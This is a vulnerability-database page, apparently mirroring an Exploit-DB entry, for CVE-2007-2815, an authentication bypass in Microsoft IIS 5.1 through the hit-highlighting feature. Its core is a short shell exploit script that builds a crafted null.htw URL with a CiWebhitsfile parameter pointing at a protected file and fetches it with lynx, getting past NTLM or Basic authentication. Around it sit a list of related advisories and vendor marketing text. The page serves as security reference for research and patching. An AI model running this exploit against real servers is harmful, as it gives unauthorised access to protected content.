Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass

🗓️ 31 May 2007 00:00:00Reported by Sha0Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 169 Views

Microsoft IIS 5.1 Hit Highlighting Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
31 May 200700:00
zdt
Check Point Advisories		Microsoft IIS WebHits Authentication Bypass - Ver2 (CVE-2007-2815)
3 Mar 201400:00
checkpoint_advisories
CVE		CVE-2007-2815
22 May 200719:00
cve
Cvelist		CVE-2007-2815
22 May 200719:00
cvelist
exploitpack		Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
31 May 200700:00
exploitpack
Tenable Nessus		Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass
25 Mar 200800:00
nessus
NVD		CVE-2007-2815
22 May 200719:30
nvd
Packet Storm		CVE-2007-2815.txt
6 Jun 200700:00
packetstorm
Prion		Authentication flaw
22 May 200719:30
prion
seebug.org		Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit
1 Jul 201400:00
seebug
Rows per page
#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: https://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# milw0rm.com [2007-05-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 May 2007 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 210
EPSS0.85872
microsoft iishit highlightingauthentication bypassntlmbasic authsecurity focuscve-2007-2815exploit
169